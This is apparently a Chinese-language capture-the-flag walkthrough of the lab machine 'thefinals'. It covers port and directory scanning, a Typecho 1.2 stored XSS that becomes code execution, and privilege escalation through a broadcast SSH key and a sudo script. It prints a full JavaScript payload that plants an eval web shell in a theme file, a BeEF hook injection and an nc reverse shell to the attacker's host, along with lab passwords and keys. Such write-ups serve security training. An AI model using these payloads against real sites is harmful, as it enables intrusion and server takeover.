51.thefinals
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# nmap -sCV 192.168.56.105 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-16 22:37 EDT
Nmap scan report for 192.168.56.105
Host is up (0.000076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey:
| 256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_ 256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
MAC Address: 08:00:27:31:DB:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
2.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# dirsearch -u 192.168.56.105 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/thefinals/reports/_192.168.56.105/_25-05-16_22-38-41.txt
Target: http://192.168.56.105/
[22:38:41] Starting:
[22:38:41] 301 - 311B - /js -> http://192.168.56.105/js/
[22:38:48] 301 - 313B - /blog -> http://192.168.56.105/blog/
[22:38:48] 200 - 17KB - /blog/
[22:38:48] 200 - 820B - /cgi-bin/printenv
[22:38:48] 200 - 1KB - /cgi-bin/test-cgi
[22:38:50] 301 - 312B - /css -> http://192.168.56.105/css/
[22:38:51] 301 - 314B - /fonts -> http://192.168.56.105/fonts/
[22:38:52] 301 - 315B - /images -> http://192.168.56.105/images/
[22:38:52] 200 - 607B - /images/
[22:38:53] 200 - 695B - /js/
[22:38:59] 301 - 320B - /screenshots -> http://192.168.56.105/screenshots/
Task Completed
2.3. Typecho XSS->RCE
blog路径下找到 login
尝试爆破,没有报出来
这里还有一个评论框
随便评论一点东西,然后你会在 /sreenshots 下看到截图。(这里应该是作者给我提示:管理员会定时访问评论区)
可以发现使用了Typecho 1.20
搜索一下看看有没有什么漏洞
Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复 - JunBlog
发现一个xss到rce的漏洞
直接用 beefxss 打
http://xxx.xxx.com/"></a><script/src=http://192.168.56.102:3000/hook.js></script><a/href="#
成功上线,但是不能Rce
用文章作者的payload打
// 定义一个函数,在网页末尾插入一个iframe元素
function insertIframe() {
// 获取当前页面路径
var urlWithoutDomain = window.location.pathname;
// 判断页面是否为评论管理页面
var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
var tSrc='';
if (hasManageComments){
// 如果是,则将路径修改为用于修改主题文件的页面地址
tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
}else{
// 如果不是,则直接使用主题文件修改页面地址
tSrc='/admin/theme-editor.php?theme=default&file=404.php';
}
// 定义iframe元素的属性,包括id、src、width、height和onload事件
var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
// 获取网页原始内容
var originalContent = document.body.innerHTML;
// 在网页末尾添加iframe元素
document.body.innerHTML = (originalContent + iframeAttributes);
}
// 定义一个全局变量isSaved,初始值为false
var isSaved = false;
// 定义一个函数,在iframe中写入一段PHP代码并保存
function writeShell() {
// 如果isSaved为false
if (!isSaved) {
// 获取iframe内的内容区域和“保存文件”按钮元素
var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');
// 获取模板文件原始内容
var oldData = content.value;
// 在原始内容前加入一段phpinfo代码
content.value = ('<?php phpinfo();eval($_POST[\'a\']); ?>\n') + oldData;
// 点击“保存文件”按钮
btns[1].click();
// 将isSaved设为true,表示已经完成写入操作
isSaved = true;
}
}
// 调用insertIframe函数,向网页中添加iframe元素和写入PHP代码的事件
insertIframe();
把payload放网页上,然后评论
#评论的website 内容
http://xxx.xxx.com/"></a><script/src=http://192.168.56.102:81/hook.js></script><a/href="#
可以发现靶机访问了这个js文件
访问
http://192.168.56.105/blog/usr/themes/default/404.php
成功触发
下面直接弹shell即可
Warning
Alpine Linux的默认shell是ash,这里要用ash进行反弹shell, bash sh 弹不了
a=system('nc 192.168.56.102 1234 -e ash');
切换到交互式的tty
python3 -c 'import pty; pty.spawn("/bin/sh")'
3. 提权
3.1. udp广播
在june目录下发现提示
/home/ju cat message.txt
cat message.txt
Contestants, gear up and get ready! Who's got the KEY? Who's got the the guts?
--- This BROADCAST has been hacked by CNS
网站目录下找到数据库配置文件
/var/www/html/blog $ ^[[37;22Rcat config.inc.php
cat config.inc.php
<?php
// site root path
define('__TYPECHO_ROOT_DIR__', dirname(__FILE__));
// plugin directory (relative path)
define('__TYPECHO_PLUGIN_DIR__', '/usr/plugins');
// theme directory (relative path)
define('__TYPECHO_THEME_DIR__', '/usr/themes');
// admin directory (relative path)
define('__TYPECHO_ADMIN_DIR__', '/admin/');
// register autoload
require_once __TYPECHO_ROOT_DIR__ . '/var/Typecho/Common.php';
// init
\Typecho\Common::init();
// config db
$db = new \Typecho\Db('Pdo_Mysql', 'typecho_');
$db->addServer(array (
'host' => 'localhost',
'port' => 3306,
'user' => 'typecho_u',
'password' => 'QLTkbviW71CSRZtGWIQdB6s',
'charset' => 'utf8mb4',
'database' => 'typecho_db',
'engine' => 'InnoDB',
), \Typecho\Db::READ | \Typecho\Db::WRITE);
\Typecho\Db::set($db);
连接数据库,里面获取到账号和hash
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| uid | name | password | mail | url | screenName | created | activated | logged | group | authCode |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
| 1 | staff | $P$B/qMMS9FETOrEZ38X0YDY5gKJOyiwQ1 | staff@thefinals.hmv | http://thefinals.hmv/blog | staff | 1743647281 | 1747456200 | 1747456140 | administrator | fc3ae2589bbdf2b690828d70bcd6a945 |
+-----+-------+------------------------------------+---------------------+---------------------------+------------+------------+------------+------------+---------------+----------------------------------+
cmd5没查到,而且这个多半还加盐了,就不用想着去爆破了。大概率是爆破不出来的
然后在日志里面发现了一个
/var/log $ ls
ls
acpid.log chrony messages scotty-main.log
apache2 dmesg scotty-main.err wtmp
/var/log $ cat scotty-main.log |head -n 10
cat scotty-main.log |head -n 10
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
Broadcast to eth0 192.168.11.255:1337
很明显这个是一个广播
监听一下看看
/ $ nc -ulvnp 1337
nc -ulvnp 1337
listening on [::]:1337 ...
connect to [::ffff:192.168.56.105]:1337 from [::ffff:192.168.56.105]:34032 ([::ffff:192.168.56.105]:34032)
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K
Warning
这里要使用 -u 参数,指定监听UDP,而不是默认的TCP, tcp这里收不到。学过这个TCP/ip的应该都知道 广播一般都走udp协议,而不是tcp协议
3.2. 提权到scotty用户
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# echo LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBMXduMDk0cGhPcXNmYm8rbzNDQllpTjN4QTE2eW1LU2JYMlVZMzJ4L0FFd0FBQUpnRGMvWVVBM1AyCkZBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTF3bjA5NHBoT3FzZmJvK28zQ0JZaU4zeEExNnltS1NiWDJVWTMyeC9BRXcKQUFBRUN2N2tmZW9YT1FDaTVDUklXZEhpRFQ1dXBLeVkzdlF4QWxLbXhFUXpSWkxEWENmVDNpbUU2cXg5dWo2amNJRmlJMwpmRURYcktZcEp0ZlpSamZiSDhBVEFBQUFFbkp2YjNSQWRHaGxabWx1WVd4ekxtaHRkZ0VDQXc9PQotLS0tLUVORCBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0K |base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEwAAAJgDc/YUA3P2
FAAAAAtzc2gtZWQyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEw
AAAECv7kfeoXOQCi5CRIWdHiDT5upKyY3vQxAlKmxEQzRZLDXCfT3imE6qx9uj6jcIFiI3
fEDXrKYpJtfZRjfbH8ATAAAAEnJvb3RAdGhlZmluYWxzLmhtdgECAw==
-----END OPENSSH PRIVATE KEY-----
拿到一个私钥,生成对应的公钥看看
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# ssh-keygen -y -f id_rsa
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDXCfT3imE6qx9uj6jcIFiI3fEDXrKYpJtfZRjfbH8AT root@thefinals.hmv
直接就是root,那就拿下了
发现没那么简单,要输入密码
应该是用户不对,看了下家目录,还有个scotty用户
┌──(root㉿kali)-[~/Desktop/hmv/thefinals]
└─# ssh -i id_rsa scotty@192.168.56.105
thefinals:~$ id
uid=1002(scotty) gid=100(users) groups=100(users),100(users)
thefinals:~$ whoami
scotty
看下Sudo
thefinals:/home/june$ sudo -l
Matching Defaults entries for scotty on thefinals:
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for scotty:
Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"
User scotty may run the following commands on thefinals:
(ALL) NOPASSWD: /sbin/secret
thefinals:/home/june$ sudo -u root /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied
提示我们要/dev/pts/99,那就是要启动99个伪终端
thefinals:/home/june$ ls /dev/pts
0 1 2 3 4 ptmx
可以发现我们现在只有5个,
使用脚本创建94个
for i in $(seq 1 94); do python -c 'import pty; pty.spawn("/bin/sh")' & done
/home/june $ ls /dev/pts
0 16 23 30 38 45 52 6 67 74 81 89 96
1 17 24 31 39 46 53 60 68 75 82 9 97
10 18 25 32 4 47 54 61 69 76 83 90 98
11 19 26 33 40 48 55 62 7 77 84 91 99
12 2 27 34 41 49 56 63 70 78 85 92 ptmx
13 20 28 35 42 5 57 64 71 79 86 93
14 21 29 36 43 50 58 65 72 8 87 94
15 22 3 37 44 51 59 66 73 80 88 95
/home/june $ tty
/dev/pts/99
然后查看密码
/home/june $ sudo -u root /sbin/secret
root:p8RuoQGTtlKLAjuF1Tpy5wX
/home/june $
试了一下发现不是系统root用户的密码,而是数据库root用户的密码
3.3. 数据库中获取root密码
MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password |
+----+----------+-------------------------+
| 1 | root | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)
~ # cat note.txt
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47
mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX
mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s
typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm
flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256
flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256
THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/